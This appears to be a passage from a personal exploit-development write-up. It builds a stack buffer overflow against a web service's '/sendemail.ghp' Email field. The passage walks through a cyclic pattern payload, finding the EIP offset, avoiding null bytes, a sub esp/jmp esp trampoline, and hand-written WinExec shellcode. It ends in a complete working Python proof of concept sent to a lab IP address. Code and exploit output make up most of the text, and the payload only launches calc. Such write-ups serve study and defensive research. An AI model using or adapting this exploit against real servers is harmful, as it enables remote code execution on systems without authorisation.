our_code = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4F"
httpServ = httplib.HTTPConnection("192.168.233.103", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()
With the PoC changed to this, the program faults, and we look up where our EIP faulted.
Then we look up the position of 66463766 in our PoC.
I won't go into detail here about how to locate that exactly; see my 01 article.
Having found position 4072, we search for a jmp esp. There is one point to watch out for here.
After finding many addresses, we cannot use any that contain \x00, because it would truncate the PoC data we send, cutting off the getpassword function that follows, which makes the program leave the overflowing function. So we have to use a different jump address. I was stuck here for a long time: back when I used an address containing \x00, the function copying the PoC data stopped at the \x00, the getpassword parameter never got included, and execution went off to some other function, so the program never faulted. So our bad characters definitely include \x00.
Our stack now looks like this. Since the space after the overflow address is not enough to hold our shellcode, we need to place the contents of BUF before the overflow point, then first use jmpcode to point EIP at the shellcode and execute it. So our PoC has to be modified to this:
our_code = "A"*(4072-112)+(112-96)*"\x90"+buf+(96-len(buf))*'\x90'+"\x3b\x20\xc5\x61"+"C"*12+jmpcode+"C"*4
Then write our jmpcode and buf.
First, jmpcode.
1. We cannot use a short EB jump, because we don't know how big our shellcode is.
2. We cannot jmp directly to an address, because we don't know our address.
So I took another approach: first sub esp, then jmp esp, because our shellcode is always at esp.
jmpcode = "\x83\xEC\x70" # sub esp,70
jmpcode += "\xFF\xE4" # jmp esp
So the jmpcode is written like this; these are hardcoded bytes.
Then write the shellcode. I won't write a reverse shell here; I wrote my own calc-popping shellcode, because I can't yet hand-write the bytes for a shell-popping shellcode myself.
1. First write the C code in VS2010:
#include <Windows.h>
int main(int argc, char *argv[])
{
WinExec("calc.exe", 5);
}
2. After compiling, right-click to view the machine code:
WinExec("calc.exe", 5);
00901000 6A 05 push 5
00901002 68 F4 20 90 00 push offset string "calc.exe" (9020F4h)
00901007 FF 15 00 20 90 00 call dword ptr [__imp__WinExec@8 (902000h)]
}
Its machine code pushes two values: 5 and the data-area address where calc.exe is stored.
So we modify our hardcoded bytes to this:
buf += "\x68\x2E\x65\x78\x65" # PUSH ".exe"
buf += "\x68\x63\x61\x6C\x63" # PUSH "calc"
buf += "\x8B\xC4" # MOV EAX,ESP
buf += "\x6A\x05" # PUSH 5
buf += "\x50" # PUSH EAX
buf += "\xBB\x91\x2C\x1A\x77" # MOV EBX,771A2C91
buf += "\xFF\xD3" # CALL EBX
Then, after adding it to the PoC, I found it would not run. Let's see what happened.
I made a mistake here too. After searching on Baidu I found that when WinExec uses the lpCmdLine parameter it does not know where the parameter ends. We know ASCII strings end with \x00, so we have to give lpCmdLine a \x00 terminator, as shown below:
buf = "\x33\xc0" # XOR EAX,EAX
buf += "\x50" # PUSH EAX
buf += "\x68\x2E\x65\x78\x65" # PUSH ".exe"
buf += "\x68\x63\x61\x6C\x63" # PUSH "calc"
buf += "\x8B\xC4" # MOV EAX,ESP
buf += "\x6A\x05" # PUSH 5
buf += "\x50" # PUSH EAX
buf += "\xBB\x91\x2C\x1A\x77" # MOV EBX,771A2C91
buf += "\xFF\xD3" # CALL EBX
So the final PoC becomes this:
#!/usr/bin/python
import httplib
buf = "\x33\xc0" # XOR EAX,EAX
buf += "\x50" # PUSH EAX
buf += "\x68\x2E\x65\x78\x65" # PUSH ".exe"
buf += "\x68\x63\x61\x6C\x63" # PUSH "calc"
buf += "\x8B\xC4" # MOV EAX,ESP
buf += "\x6A\x05" # PUSH 5
buf += "\x50" # PUSH EAX
buf += "\xBB\x91\x2C\x1A\x77" # MOV EBX,771A2C91
buf += "\xFF\xD3" # CALL EBX
jmpcode = "\x83\xEC\x70"
jmpcode += "\xFF\xE4"
print len(buf)
our_code = "A"*(4072-112)+(112-96)*"\x90"+buf+(96-len(buf))*'\x90'+"\x3b\x20\xc5\x61"+"C"*12+jmpcode+"C"*4
httpServ = httplib.HTTPConnection("192.168.233.103", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()
Run it, and you will see that our PoC executes successfully.
There is still a lot in here I don't know, and this is only a stack overflow, which is relatively simple, yet it still took me quite a while. This is a record of my own analysis; next time I hope to share something at a higher technical level.